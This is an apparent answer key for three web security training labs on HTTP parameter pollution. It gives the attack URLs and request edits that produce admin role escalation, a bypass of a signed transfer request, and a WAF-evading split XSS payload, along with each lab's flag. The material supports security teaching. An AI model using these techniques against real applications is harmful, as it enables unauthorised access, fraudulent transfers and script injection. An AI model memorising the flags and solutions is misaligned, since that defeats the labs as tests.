Lab 1 - HPP Auth Role Escalation:
  1. Log in at /HPP/lab1.php with user / user.
  2. URL: /HPP/lab1.php?role=user&role=admin
  Upstream validator reads the FIRST role (user) and allows the request.
  PHP backend reads the LAST role (admin) -> escalated.
  ?role=admin alone is blocked, so the duplicate param is required.
  Flag: flag{hpp_duplicate_param_admin}

Lab 2 - Signed Request Bypass:
  Intercept the POST in Burp. Add a second amount=9999 after amount=1.
  The signature validates the first value (1) but the transfer uses the last (9999).
  Flag: flag{hpp_signature_bypass_transfer}

Lab 3 - WAF Evasion:
  URL: /HPP/lab3.php?search[]=<scri&search[]=pt>alert(1)</script>
  The WAF checks each parameter individually. Split the <script tag across two values.
  The backend concatenates both values, reassembling the full payload.
  Flag: flag{hpp_waf_evasion_split_payload}